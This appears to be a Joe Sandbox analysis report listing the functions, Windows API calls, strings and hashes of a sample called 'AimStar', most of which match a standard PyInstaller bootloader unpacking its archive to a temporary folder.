Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
Instruction ID: 3d6b423a49bdf77829fa1d38af55f55ce240d54d2c4597cbe03b68c8a6d3d3b4
Opcode Fuzzy Hash: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
Instruction Fuzzy Hash: 37C1E336B28E4185EB10DFA5C4922AC7779F749BA8F414225DE2E973D4CF38E059C310

Function 00007FF710F483B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,00007FF710F48B09,00007FF710F43FA5), ref: 00007FF710F4841B
RemoveDirectoryW.KERNEL32(?,00007FF710F48B09,00007FF710F43FA5), ref: 00007FF710F4849E
DeleteFileW.KERNELBASE(?,00007FF710F48B09,00007FF710F43FA5), ref: 00007FF710F484BD
FindNextFileW.KERNELBASE(?,00007FF710F48B09,00007FF710F43FA5), ref: 00007FF710F484CB
FindClose.KERNEL32(?,00007FF710F48B09,00007FF710F43FA5), ref: 00007FF710F484DC
RemoveDirectoryW.KERNELBASE(?,00007FF710F48B09,00007FF710F43FA5), ref: 00007FF710F484E5

Strings

%s\*, xrefs: 00007FF710F483E2

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
String ID: %s\*
API String ID: 1057558799-766152087
Opcode ID: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
Instruction ID: c8804d72b37f4fb3828078c608a66fd4d2ac8d57e5ae98e05546d570fe33ce39
Opcode Fuzzy Hash: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
Instruction Fuzzy Hash: 28415C31A0CD4795EA60FB24E4569BDA368EB95764FC00232DA9D82794DF2CF54EC720

Function 00007FF710F492F0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNELBASE ref: 00007FF710F49323
FindClose.KERNELBASE ref: 00007FF710F49332

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
Instruction ID: eb04b7a23a504dda5c4cc24377168714489a7164a0105c3d30689595ea8f8b38
Opcode Fuzzy Hash: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
Instruction Fuzzy Hash: 83F0A432A1CA4586F7A09F60B45AB7AA394AB89338F840335DA6D427D4DF3CF04CCA00

Function 00007FF710F41950 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF710F47F80: _fread_nolock.LIBCMT ref: 00007FF710F4802A

_fread_nolock.LIBCMT ref: 00007FF710F41A1B

Part of subcall function 00007FF710F42910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF710F41B6A), ref: 00007FF710F4295E

Strings

Failed to read cookie!, xrefs: 00007FF710F41A2B
Failed to seek to cookie position!, xrefs: 00007FF710F419EE
MEI, xrefs: 00007FF710F41991
Could not allocate memory for archive structure!, xrefs: 00007FF710F41A61
fread, xrefs: 00007FF710F41A32, 00007FF710F41B5C
calloc, xrefs: 00007FF710F41A68
Error on file., xrefs: 00007FF710F41B8D
Could not read full TOC!, xrefs: 00007FF710F41B55
malloc, xrefs: 00007FF710F41B22
Could not allocate buffer for TOC!, xrefs: 00007FF710F41B1B
fseek, xrefs: 00007FF710F419F5

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: _fread_nolock$CurrentProcess
String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
API String ID: 2397952137-3497178890
Opcode ID: 6d43d2f5094c02a69a50d2278f5fdcc42b4033f4591644595bdd37c4696fd258
Instruction ID: 41efa7b3495124fff8043f3b7efdc5bffd634e46589c353aa36484e706f4381c
Opcode Fuzzy Hash: 6d43d2f5094c02a69a50d2278f5fdcc42b4033f4591644595bdd37c4696fd258
Instruction Fuzzy Hash: 5E816F75B0CE8685E760AB24D442AF9B3A8FB48764F844431EE4D87785DE3CF589C760

Function 00007FF710F41600 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: failed to write data chunk!, xrefs: 00007FF710F417CA
Failed to extract %s: failed to open target file!, xrefs: 00007FF710F4165C
fread, xrefs: 00007FF710F417E6
fopen, xrefs: 00007FF710F41663
Failed to extract %s: failed to allocate temporary buffer!, xrefs: 00007FF710F41742
Failed to extract %s: failed to open archive file!, xrefs: 00007FF710F416A2
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF710F416DA
malloc, xrefs: 00007FF710F41749
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF710F417DF
fwrite, xrefs: 00007FF710F417D1
Failed to create symbolic link %s!, xrefs: 00007FF710F41622
fseek, xrefs: 00007FF710F416E1

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
API String ID: 2050909247-1550345328
Opcode ID: bdb202e1f9bc7177cec46868f1cc56065c6c33e9ec8a8b0f81691881613973e0
Instruction ID: 7816bcef1fa70d460e86ca810e2f4f89878ad3b0ef38055e2c30d485185660e1
Opcode Fuzzy Hash: bdb202e1f9bc7177cec46868f1cc56065c6c33e9ec8a8b0f81691881613973e0
Instruction Fuzzy Hash: B1515C75B0CE4692EA10BB21A4029A9A3A8BF447B4FC44531EE0C87796DE3CF589C760

Function 00007FF710F48850 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathW.KERNEL32(?,?,00000000,00007FF710F43CBB), ref: 00007FF710F488F4
GetCurrentProcessId.KERNEL32(?,00000000,00007FF710F43CBB), ref: 00007FF710F488FA
CreateDirectoryW.KERNELBASE(?,00000000,00007FF710F43CBB), ref: 00007FF710F4893C

Part of subcall function 00007FF710F48A20: GetEnvironmentVariableW.KERNEL32(00007FF710F4388E), ref: 00007FF710F48A57
Part of subcall function 00007FF710F48A20: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF710F48A79

Part of subcall function 00007FF710F582A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF710F582C1

Part of subcall function 00007FF710F42810: MessageBoxW.USER32 ref: 00007FF710F428EA

Strings

TMP, xrefs: 00007FF710F488B2
_MEI%d, xrefs: 00007FF710F48902
LOADER: length of teporary directory path exceeds maximum path length!, xrefs: 00007FF710F4896E
LOADER: failed to set the TMP environment variable., xrefs: 00007FF710F488CC
TMP, xrefs: 00007FF710F4888C, 00007FF710F48993

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
API String ID: 3563477958-1339014028
Opcode ID: 4e349524156a31c65ddba45994ef87c37bf84ce1b0e485ec316371ea64373d4f
Instruction ID: 91674fd2d4983c8932960ca1ba99b02b7a0d00544424844afb52f5cdf313c4c3
Opcode Fuzzy Hash: 4e349524156a31c65ddba45994ef87c37bf84ce1b0e485ec316371ea64373d4f
Instruction Fuzzy Hash: B0418021B1DE4250EA10BB26A8576BD93A8AF85BA4FC44031ED0D877D6DE3CF54EC320

Function 00007FF710F41210 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 158
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: inflateInit() failed with return code %d!, xrefs: 00007FF710F41276
Failed to extract %s: decompression resulted in return code %d!, xrefs: 00007FF710F4141E
Failed to extract %s: failed to allocate temporary input buffer!, xrefs: 00007FF710F412BA
1.3.1, xrefs: 00007FF710F41249
malloc, xrefs: 00007FF710F412C1, 00007FF710F412F6
Failed to extract %s: failed to allocate temporary output buffer!, xrefs: 00007FF710F412EF

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: CurrentProcess
String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
API String ID: 2050909247-2813020118
Opcode ID: 4135646233a09d1bafe58e36eb504b74d27aad0b28d423605d6bf35aaf273347
Instruction ID: c086fc86ed1e5a7eba84767f62f73d64fb4f61f4d74099aff627033b576fcd02
Opcode Fuzzy Hash: 4135646233a09d1bafe58e36eb504b74d27aad0b28d423605d6bf35aaf273347
Instruction Fuzzy Hash: A451CF32B0CE4681EA60BB15A4027BAA299BF857A4FC44131ED4D87B95EF3CF549C320

Function 00007FF710F5ED80 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?,?,?,00007FF710F5F11A,?,?,-00000018,00007FF710F5ADC3,?,?,?,00007FF710F5ACBA,?,?,?,00007FF710F55FAE), ref: 00007FF710F5EEFC
GetProcAddress.KERNEL32(?,?,?,00007FF710F5F11A,?,?,-00000018,00007FF710F5ADC3,?,?,?,00007FF710F5ACBA,?,?,?,00007FF710F55FAE), ref: 00007FF710F5EF08

Strings

api-ms-, xrefs: 00007FF710F5EE46
ext-ms-, xrefs: 00007FF710F5EE59

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
Instruction ID: 3f9b8ab6d8581fe41d81464aef735dad918fc7068acf2bfcec1b14185e2e4dff
Opcode Fuzzy Hash: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
Instruction Fuzzy Hash: 7C41E521B2DE0242EA19EF169806675A3A9BF49BB0FC98535ED1D87784DE3CF54DC320

Function 00007FF710F436B0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(?,00007FF710F43804), ref: 00007FF710F436E1
GetLastError.KERNEL32(?,00007FF710F43804), ref: 00007FF710F436EB

Part of subcall function 00007FF710F42C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF710F43706,?,00007FF710F43804), ref: 00007FF710F42C9E
Part of subcall function 00007FF710F42C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF710F43706,?,00007FF710F43804), ref: 00007FF710F42D63
Part of subcall function 00007FF710F42C50: MessageBoxW.USER32 ref: 00007FF710F42D99

Strings

Failed to obtain executable path., xrefs: 00007FF710F436F3
GetModuleFileNameW, xrefs: 00007FF710F436FA
Failed to resolve full path to executable %ls., xrefs: 00007FF710F43739
Failed to convert executable path to UTF-8., xrefs: 00007FF710F43790
\\?\, xrefs: 00007FF710F4375A

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
API String ID: 3187769757-2863816727
Opcode ID: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
Instruction ID: fd07ceef45b65797b23486e0affbb32188036ea8bc2e9e3f21e6dd08f14ffbac
Opcode Fuzzy Hash: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
Instruction Fuzzy Hash: A12121A1B1CD4251FA60BB20E8567BAA258BF48764FC08132DA9DC27D5EE2CF50DC760

Function 00007FF710F5BACC Relevance: 10.8, APIs: 7, Instructions: 290
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF710F5BEF9

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 07c5dcf76cbe3182a9f46e495b791f87a2923bbe72b553d2f04cfdf557d03735
Instruction ID: e513b7bace5172dc647aefc25a027b363195179d1958c5dc7006568bbb1289f0
Opcode Fuzzy Hash: 07c5dcf76cbe3182a9f46e495b791f87a2923bbe72b553d2f04cfdf557d03735
Instruction Fuzzy Hash: A7C1B722A0CE8A52E751AB1594472BDB7B8EB81BA0FD54131EA4D03791CF7CF65DCB20

Function 00007FF710F48760 Relevance: 10.6, APIs: 7, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF710F48780
OpenProcessToken.ADVAPI32 ref: 00007FF710F48793
GetTokenInformation.KERNELBASE ref: 00007FF710F487B8
GetLastError.KERNEL32 ref: 00007FF710F487C2
GetTokenInformation.KERNELBASE ref: 00007FF710F48802
ConvertSidToStringSidW.ADVAPI32 ref: 00007FF710F4881E
CloseHandle.KERNEL32 ref: 00007FF710F48836

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID:
API String ID: 995526605-0
Opcode ID: ccba17952e233d5b695068aab9421341a55ed3ebff0a2a14ee99ad80d8ea5500
Instruction ID: 4cb4539ae922a3e53de7249358d85fd9cb5074120d151f59e427136b93f93a90
Opcode Fuzzy Hash: ccba17952e233d5b695068aab9421341a55ed3ebff0a2a14ee99ad80d8ea5500
Instruction Fuzzy Hash: 14217531A0CE4642EB10AB59F45166EE7A8FB857B0F900235EA6C837E4DE6CF449C710

Function 00007FF710F490E0 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF710F48760: GetCurrentProcess.KERNEL32 ref: 00007FF710F48780
Part of subcall function 00007FF710F48760: OpenProcessToken.ADVAPI32 ref: 00007FF710F48793
Part of subcall function 00007FF710F48760: GetTokenInformation.KERNELBASE ref: 00007FF710F487B8
Part of subcall function 00007FF710F48760: GetLastError.KERNEL32 ref: 00007FF710F487C2
Part of subcall function 00007FF710F48760: GetTokenInformation.KERNELBASE ref: 00007FF710F48802
Part of subcall function 00007FF710F48760: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF710F4881E
Part of subcall function 00007FF710F48760: CloseHandle.KERNEL32 ref: 00007FF710F48836

LocalFree.KERNEL32(?,00007FF710F43C55), ref: 00007FF710F4916C
LocalFree.KERNEL32(?,00007FF710F43C55), ref: 00007FF710F49175

Strings

D:(A;;FA;;;%s), xrefs: 00007FF710F49157
D:(A;;FA;;;%s)(A;;FA;;;%s), xrefs: 00007FF710F49142
S-1-3-4, xrefs: 00007FF710F49121
Security descriptor string length exceeds PYI_PATH_MAX!, xrefs: 00007FF710F49183

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
API String ID: 6828938-1529539262
Opcode ID: 44a76ac2d965b652da6d7152683ffc914eb32e79e00aec7a7a922ce7c9633e88
Instruction ID: 532235cf7e9e6ed5e2707603178fabec15aacca371d74e7af265ef332ab54cfd
Opcode Fuzzy Hash: 44a76ac2d965b652da6d7152683ffc914eb32e79e00aec7a7a922ce7c9633e88
Instruction Fuzzy Hash: 09214C35A0CE4241E650BB10E9166EAA3A8EB897A0FC40031EE4D93796DF3CF849C760

Function 00007FF710F5CFD0 Relevance: 6.2, APIs: 4, Instructions: 218
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF710F5CFBB), ref: 00007FF710F5D0EC
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF710F5CFBB), ref: 00007FF710F5D177

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
Instruction ID: 3eedf9bb8d26ca03f70764ed13259895d48c43eed860efe5441def85ab95e8fa
Opcode Fuzzy Hash: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
Instruction Fuzzy Hash: 0391C422E1DE5185F760BF6594422BDABB8AB40BA8F944135DE0E537C5CE38F58AC720

Function 00007FF710F55698 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF710F556C5
CreateFileW.KERNELBASE ref: 00007FF710F55704
CloseHandle.KERNEL32 ref: 00007FF710F55739

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: CloseCreateFileHandle_invalid_parameter_noinfo
String ID:
API String ID: 1279662727-0
Opcode ID: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
Instruction ID: 57b0805b4dedd170d077c52c52f2dd55480e61956bb90982d794e7ba44127fe1
Opcode Fuzzy Hash: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
Instruction Fuzzy Hash: FC41A422D1CB8183E710AB20A525369B274FB98774F508334E65C43BD1DF6CB6E8C720

Function 00007FF710F4CCAC Relevance: 4.6, APIs: 3, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF710F4CE7C: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF710F4CE90

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF710F4CCD0
__scrt_release_startup_lock.LIBCMT ref: 00007FF710F4CD3E
__scrt_get_show_window_mode.LIBCMT ref: 00007FF710F4CD91

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
String ID:
API String ID: 3251591375-0
Opcode ID: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
